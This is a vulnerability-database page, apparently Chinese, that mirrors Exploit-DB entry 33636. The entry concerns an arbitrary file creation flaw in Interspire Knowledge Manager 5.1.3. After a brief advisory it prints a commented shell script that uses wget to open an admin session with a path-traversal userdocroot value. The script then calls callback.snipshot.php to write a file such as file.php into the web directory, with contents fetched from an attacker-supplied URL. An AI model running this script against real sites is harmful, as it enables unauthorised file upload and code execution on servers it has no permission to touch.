Interspire Knowledge Manager 5 - 'callback.snipshot.php' Arbitrary File Creation

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059155 漏洞类型
发布时间 2010-02-03 更新时间 2010-02-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/33636
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/38186/info

Interspire Knowledge Manager is prone to a vulnerability that allows attackers to create arbitrary files on a vulnerable computer.

An attacker may exploit this issue to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.

Knowledge Manager 5.1.3 is vulnerable; other versions may also be affected. 

# #!/bin/sh
# echo "$0 <target_url> <relative_path_from_admin_dir> <file_name>
<content_url>
# example: $0 http://target.com/knowledge_base ../../../ file.php
http://source
# if kb is installed at knowledge_base, then the file: file.php will be
# created in the base application directory from the content at
http://source
# "
# sessionUrl=$1'/admin/de/dialog/file_manager.php'
# uploadUrl=$1'/admin/de/dialog/callback.snipshot.php'
# wget -O r1 --save-cookies tmp.cookies --keep-session-cookies
"$sessionUrl?userdocroot=$2&imgDir=&obj=1"
# echo "session created, setting file name $2$3"
# wget -O r2 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step1&source_image=name&save_file_as=$3"
# echo "upload content from: $4 ..."
# wget -O r3 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4"
# echo "file created test access to the script at: $1/admin/de/dialog/$2$3";